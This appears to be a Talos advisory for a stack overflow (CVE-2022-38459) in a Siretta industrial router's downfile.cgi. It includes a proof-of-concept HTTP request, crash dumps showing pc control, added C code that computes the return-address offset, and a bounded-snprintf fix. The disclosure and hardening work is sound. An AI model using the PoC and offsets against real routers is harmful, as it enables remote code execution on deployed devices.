CVSS3 (as listed by the vulnerability aggregator): CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector: NETWORK; Attack Complexity: LOW; Privileges Required: LOW; User Interaction: NONE; Scope: UNCHANGED; Confidentiality Impact: HIGH; Integrity Impact: HIGH; Availability Impact: HIGH
EPSS Percentile: 50.2%
CVE-2022-38459
A stack-based buffer overflow vulnerability exists in the httpd downfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Siretta QUARTZ-GOLD G5.0.1.5-210720-141020
QUARTZ-GOLD - https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/
7.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CWE-120 - Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
The Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as SSH, UPnP, VPN, SNMP and many others.
The QUARTZ-GOLD router runs a web server with several functionalities, a subset of which manage external files: the web server offers APIs for uploading files, downloading them, and deleting them when they are no longer required.
The following is the API used to download a previously uploaded file:
void downfile.cgi(void)
{
  [...]
  _filename_param = (char *)webcgi_safeget("_filename");                      [1]
  filename = "";
  if (_filename_param != (char *)0x0) {
    filename = _filename_param;
  }
  [... calculate base_folder ...]
  if (*filename != '\0') {
    /* attacker-controlled filename copied into a fixed-size stack buffer */
    sprintf(buff,"Content-Disposition:attachment;filename=\"%s\"",(char *)filename);
    send_header(200,buff,"application/tomato-binary-file",0);
    sprintf(buff,"%s/%s",base_folder,filename);                                 [2]
    do_file(buff);                                                              [3]
  }
  return;
}
The downfile.cgi handler expects one parameter, _filename, which names the file to be downloaded. At [1] the supplied parameter is fetched, and at [2] it is used as an argument to sprintf, which writes into buff without regard for the size of the destination buffer. If the _filename parameter is longer than a certain length, the instruction at [2] causes a stack-based buffer overflow that can lead to remote code execution.
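To make the size problem at [2] concrete, the following is an added example and not code from the report or from the Siretta firmware. It assumes buff is 1024 bytes (the 0x400 frame the epilogue later releases with add sp, sp, #1024), that base_folder is "/jffs" (the value visible in r6 in the register dump), and it uses a constructed 1080-byte _filename, the length of the cyclic pattern in the PoC request below. It places the unbounded sprintf pattern beside a bounded snprintf whose return value is checked, which is the fix a reviewer would ask for here.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define BUFF_SIZE   1024      /* assumed: the 0x400 stack frame for buff */
#define BASE_FOLDER "/jffs"   /* assumed: base_folder as seen in r6 */
#define POC_NAME_LEN 1080     /* constructed: length of the PoC _filename value */

/* The pattern at [2]: sprintf into a fixed-size stack buffer, no bound on
 * filename. Bytes beyond BUFF_SIZE land on the saved registers. */
static void build_path_unsafe(char buff[BUFF_SIZE], const char *base_folder,
                              const char *filename)
{
    sprintf(buff, "%s/%s", base_folder, filename);
}

/* Hardened form. snprintf never writes past `size`, and returns the length the
 * full string would have had; a value >= size means it did not fit. For a file
 * path, truncation must be an error, not something silently served. */
static bool build_path_safe(char *buff, size_t size, const char *base_folder,
                            const char *filename)
{
    int n = snprintf(buff, size, "%s/%s", base_folder, filename);
    if (n < 0 || (size_t)n >= size) {
        buff[0] = '\0';
        return false;
    }
    return true;
}

/* Bytes sprintf would write for a given name, terminating NUL included. */
static size_t path_bytes_needed(const char *base_folder, const char *filename)
{
    return strlen(base_folder) + 1 + strlen(filename) + 1;
}

static void make_poc_name(char *name)
{
    memset(name, 'A', POC_NAME_LEN);      /* constructed stand-in for the pattern */
    name[POC_NAME_LEN] = '\0';
}

/* "/jffs" + "/" + 1080 bytes + NUL = 1087 bytes, 63 more than buff holds. */
static size_t poc_bytes_needed(void)
{
    char name[POC_NAME_LEN + 1];
    make_poc_name(name);
    return path_bytes_needed(BASE_FOLDER, name);
}

static bool poc_name_rejected(void)
{
    char name[POC_NAME_LEN + 1];
    char buff[BUFF_SIZE];
    make_poc_name(name);
    return !build_path_safe(buff, sizeof buff, BASE_FOLDER, name);
}

static bool short_name_ok(void)
{
    char buff[BUFF_SIZE];
    return build_path_safe(buff, sizeof buff, BASE_FOLDER, "config.bin")
        && strcmp(buff, "/jffs/config.bin") == 0;
}

int main(void)
{
    char buff[BUFF_SIZE];
    build_path_unsafe(buff, BASE_FOLDER, "config.bin");   /* fine only while short */
    printf("unsafe path for a short name: %s\n", buff);
    printf("PoC path needs %zu bytes, buff holds %d\n", poc_bytes_needed(), BUFF_SIZE);
    printf("PoC name rejected by bounded version: %s\n", poc_name_rejected() ? "yes" : "no");
    printf("short name accepted: %s\n", short_name_ok() ? "yes" : "no");
    return 0;
}
```

The first sprintf (the Content-Disposition header) writes the same unbounded filename into the same buffer and deserves the identical treatment; the example only covers [2] because that is the write the report's crash dump is about.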
$r0  : 0x0
$r1  : 0x0
$r2  : 0x7ef38c60  →  "/jffs/aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa[...]"
$r3  : 0x2000
$r4  : 0x61666b61 ("akfa"?)
$r5  : 0x61676b61 ("akga"?)
$r6  : 0x61686b61 ("akha"?)
$r7  : 0x1
$r8  : 0x0
$r9  : 0x0001e658  →  "downfile.cgi"
$r10 : 0x0001dbac  →  0x0001e658  →  "downfile.cgi"
$r11 : 0x7ef3b784  →  "admin"
$r12 : 0x2ae5573c  →  0x2ae41ac4  →  <_pthread_cleanup_pop_restore+0> push {r3, lr}
$sp  : 0x7ef39070  →  "akjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaak"
$lr  : 0x2ae3bb30  →  <free+492> pop {r0, r1, r2, r3, r4, r5, r6, pc}
$pc  : 0x61696b60 ("`kia"?)
$cpsr: [negative ZERO CARRY overflow interrupt fast THUMB]
───────────────────────────────────────────────────────────────────────── stack ────
0x7ef39070│+0x0000: "akjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaak"	 ← $sp
0x7ef39074│+0x0004: "akkaaklaakmaaknaakoaakpaakqaakraaksaaktaak"
0x7ef39078│+0x0008: "aklaakmaaknaakoaakpaakqaakraaksaaktaak"
0x7ef3907c│+0x000c: "akmaaknaakoaakpaakqaakraaksaaktaak"
0x7ef39080│+0x0010: "aknaakoaakpaakqaakraaksaaktaak"
0x7ef39084│+0x0014: "akoaakpaakqaakraaksaaktaak"
0x7ef39088│+0x0018: "akpaakqaakraaksaaktaak"
0x7ef3908c│+0x001c: "akqaakraaksaaktaak"
─────────────────────────────────────────────────────────────────── code:arm:THUMB ────
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x61696b60
─────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "httpd", stopped 0x61696b60 in ?? (), reason: SIGSEGV
Sending a request like the following (with a valid _http_id) produces the crash above:
POST /downfile.cgi HTTP/1.1
Authorization: Basic <a>
Content-Length: 1119
_filename=aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaajzaakbaakcaakdaakeaakfaakgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaak&_http_id=<the correct tid>
At the epilogue of downfile.cgi, just before the function returns, the register state is:
$r0  : 0x0
$r1  : 0x0
$r2  : 0x7ef38c60  →  "/jffs/aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa[...]"
$r3  : 0x2000
$r4  : 0x7ef38c60  →  "/jffs/aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa[...]"
$r5  : 0x00031082  →  "aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaama[...]"
$r6  : 0x0002272b  →  "/jffs"
$r7  : 0x1
$r8  : 0x0
$r9  : 0x0001e658  →  "downfile.cgi"
$r10 : 0x0001dbac  →  0x0001e658  →  "downfile.cgi"
$r11 : 0x7ef3b784  →  "admin"
$r12 : 0x2ae5573c  →  0x2ae41ac4  →  <_pthread_cleanup_pop_restore+0> push {r3, lr}
$sp  : 0x7ef39060  →  "akfaakgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaak[...]"
$lr  : 0x2ae3bb30  →  <free+492> pop {r0, r1, r2, r3, r4, r5, r6, pc}
$pc  : 0x0000f96c  →  pop {r4, r5, r6, pc}
$cpsr: [negative ZERO CARRY overflow interrupt fast thumb]
───────────────────────────────────────────────────────────────────────── stack ────
0x7ef39060│+0x0000: "akfaakgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaak[...]"	 ← $sp
0x7ef39064│+0x0004: "akgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaakraak[...]"
0x7ef39068│+0x0008: "akhaakiaakjaakkaaklaakmaaknaakoaakpaakqaakraaksaak[...]"
0x7ef3906c│+0x000c: "akiaakjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaak"
0x7ef39070│+0x0010: "akjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaak"
0x7ef39074│+0x0014: "akkaaklaakmaaknaakoaakpaakqaakraaksaaktaak"
0x7ef39078│+0x0018: "aklaakmaaknaakoaakpaakqaakraaksaaktaak"
0x7ef3907c│+0x001c: "akmaaknaakoaakpaakqaakraaksaaktaak"
───────────────────────────────────────────────────────────────────── code:arm:ARM ────
     0xf960                  mov    r0, sp
     0xf964                  bl     0xbbc8
     0xf968                  add    sp, sp, #1024 ; 0x400
 →   0xf96c                  pop    {r4, r5, r6, pc}
[!] Cannot disassemble from $PC
─────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "httpd", stopped 0xf96c in ?? (), reason: BREAKPOINT
───────────────────────────────────────────────────────────────────────── trace ────
[#0] 0xf96c → pop {r4, r5, r6, pc}
[#1] 0x2ae3bb30 → free()
The next instruction, pop {r4, r5, r6, pc}, loads r4, r5 and r6 from the first three words at sp and pc from the fourth:
gef➤  hexdump dw $sp
0x7ef39060│+0x0000   0x61666b61
0x7ef39064│+0x0004   0x61676b61
0x7ef39068│+0x0008   0x61686b61
0x7ef3906c│+0x000c   0x61696b61
[...]
After the pop, pc holds 0x61696b61. Because bit 0 of that value is set, the pop also switches the core to Thumb state and execution resumes at 0x61696b60, which is exactly what the earlier crash dump shows: pc = 0x61696b60, THUMB set in cpsr, and a SIGSEGV because that address is not mapped. The return address is thus taken directly from the _filename parameter, giving the attacker control of execution.
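To show how the register values in the dumps map back to positions in the request, here is an added example that is not part of the report. It rebuilds the cyclic pattern used as _filename (the standard de Bruijn construction over the lowercase alphabet with 4-byte windows, which is what tools such as pwntools' cyclic() emit), locates the 4 little-endian bytes each clobbered register holds, and compares that with the offsets predicted from the frame layout. BUFF_SIZE 1024 and BASE_FOLDER "/jffs" are taken from the disassembly and register dump above; the slot arithmetic (buff, then r4, r5, r6, pc) is inferred from the epilogue and is an assumption of this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ALPHABET     "abcdefghijklmnopqrstuvwxyz"
#define ALPHABET_LEN 26
#define SUBSEQ_LEN   4          /* every 4-byte window of the pattern is unique */

#define BUFF_SIZE   1024        /* assumed from: add sp, sp, #1024 */
#define BASE_FOLDER "/jffs"     /* assumed from: r6 → "/jffs" */

struct db_state {
    int a[SUBSEQ_LEN * ALPHABET_LEN + 1];
    char *out;
    size_t len, cap;
};

/* Standard de Bruijn sequence construction; writes at most `cap` bytes. */
static void de_bruijn(struct db_state *s, int t, int p)
{
    if (t > SUBSEQ_LEN) {
        if (SUBSEQ_LEN % p == 0)
            for (int i = 1; i <= p; i++)
                if (s->len < s->cap)
                    s->out[s->len++] = ALPHABET[s->a[i]];
        return;
    }
    s->a[t] = s->a[t - p];
    de_bruijn(s, t + 1, p);
    for (int j = s->a[t - p] + 1; j < ALPHABET_LEN; j++) {
        s->a[t] = j;
        de_bruijn(s, t + 1, t);
    }
}

/* First n bytes of the cyclic pattern: "aaaabaaacaaad..." as in the PoC. */
static size_t cyclic(char *out, size_t n)
{
    struct db_state s = { .out = out, .len = 0, .cap = n };
    memset(s.a, 0, sizeof s.a);
    de_bruijn(&s, 1, 1);
    return s.len;
}

/* Offset in the pattern of the 4 bytes a little-endian ARM register holds,
 * e.g. pc = 0x61696b61 → bytes 61 6b 69 61 → "akia". Returns -1 if the value
 * is not in the pattern or contains a NUL byte (strstr cannot search for it). */
static long cyclic_find(uint32_t reg_value, size_t pattern_len)
{
    char needle[SUBSEQ_LEN + 1];
    for (int i = 0; i < SUBSEQ_LEN; i++) {
        needle[i] = (char)((reg_value >> (8 * i)) & 0xff);
        if (needle[i] == '\0')
            return -1;
    }
    needle[SUBSEQ_LEN] = '\0';

    char *pat = malloc(pattern_len + 1);
    if (!pat)
        return -1;
    pat[cyclic(pat, pattern_len)] = '\0';
    char *hit = strstr(pat, needle);
    long off = hit ? (long)(hit - pat) : -1;
    free(pat);
    return off;
}

/* Offset inside _filename of a saved-register slot (0=r4, 1=r5, 2=r6, 3=pc).
 * buff = "/jffs/" + _filename and is BUFF_SIZE bytes, so the slot at
 * buff + 1024 + 4*slot corresponds to _filename offset 1024 + 4*slot - 6. */
static long slot_offset_in_filename(int slot)
{
    return (long)BUFF_SIZE + 4L * slot - (long)(strlen(BASE_FOLDER) + 1);
}

int main(void)
{
    /* r4, r5, r6 and the popped pc from the crash dump */
    uint32_t regs[4]  = { 0x61666b61, 0x61676b61, 0x61686b61, 0x61696b61 };
    const char *nm[4] = { "r4", "r5", "r6", "pc" };
    for (int i = 0; i < 4; i++)
        printf("%s = 0x%08x  pattern offset %ld, frame layout predicts %ld\n",
               nm[i], regs[i], cyclic_find(regs[i], 4096), slot_offset_in_filename(i));
    return 0;
}
```

Both methods agree: the saved pc is 1030 bytes into _filename, 1036 bytes into buff, so a filename of at least 1034 bytes already reaches the return address. This is the check a practitioner runs before trusting a crash dump: if the offsets from the pattern and from the frame layout disagree, the decompiled buffer size or the prefix assumption is wrong.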
2022-10-14 - Initial Vendor Contact
2022-10-20 - Vendor Disclosure
2022-11-24 - Vendor Patch Release
2023-01-26 - Public Release
Discovered by Francesco Benvenuto of Cisco Talos.